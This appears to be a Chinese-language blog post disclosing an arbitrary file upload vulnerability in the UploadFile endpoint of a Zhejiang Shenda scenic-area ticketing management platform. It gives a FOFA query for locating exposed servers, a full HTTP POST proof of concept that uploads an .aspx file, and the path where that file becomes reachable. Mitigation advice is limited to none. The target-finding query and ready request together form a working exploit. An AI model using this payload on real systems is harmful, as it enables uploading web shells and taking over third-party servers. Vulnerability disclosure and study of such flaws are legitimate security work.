浙江深大智能科技有限公司管控平台服务端存在任意文件上传漏洞

漏洞描述

智游宝是连接景区与分销商(OTA、旅行社)的公正、权威、可信的第三方服务平台。作为国内智慧景区第三方技术服务支撑平台,智游宝为景区提供了可控制分销商的管理环境,安全、便捷、高效地实现了电子票的生产、发送、检票、退换票以及票款回收等技术环节;为分销商提供了便捷的采购和发货渠道;为景区提供了一系列数据分析报告,辅助景区决策。浙江深大智能科技有限公司管控平台服务端UploadFile存在任意文件上传漏洞。

漏洞复现

FOFA

复制代码
body="ItemsControlServer.aspx"

POC

复制代码
POST /Launch/UploadFile?FileName=toto.aspx&Version=1&Size=100 HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1

2

上传后文件路径

复制代码
/Launch/Client/toto.aspx
相关推荐
人机与认知实验室5 小时前
艺术与科技的具身、离身、反身
科技
独行soc8 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
聽雨23716 小时前
02每日简报20250704
linux·科技·金融·生活·社交电子·娱乐·媒体
v先v关v住v获v取16 小时前
鼓式制动器的设计+(说明书和CAD【6张】 - 副本➕降重
科技
许泽宇的技术分享20 小时前
从新闻到知识图谱:用大模型和知识工程“八步成诗”打造科技并购大脑
人工智能·科技·知识图谱
v先v关v住v获v取1 天前
焊接机器人结构设计cad【16张】三维图+设计说明书+绛重
科技
小眼睛FPGA2 天前
【RK3568+PG2L50H开发板实验例程】FPGA部分/紫光同创 IP core 的使用及添加
科技·嵌入式硬件·ai·fpga开发·gpu算力
文火冰糖的硅基工坊2 天前
[创业之路-458]:企业经营层 - 蓝海战略 - 重构价值曲线、整合产业要素、创造新需求
科技·重构·架构·创业·业务
永洪科技2 天前
永洪科技荣获商业智能品牌影响力奖,全力打造”AI+决策”引擎
大数据·人工智能·科技·数据分析·数据可视化·bi
景联文科技2 天前
浙江省经信厅数据算力与基础设施处处长庞为兴带队调研景联文科技,共探工业数据驱动智造新路径!
科技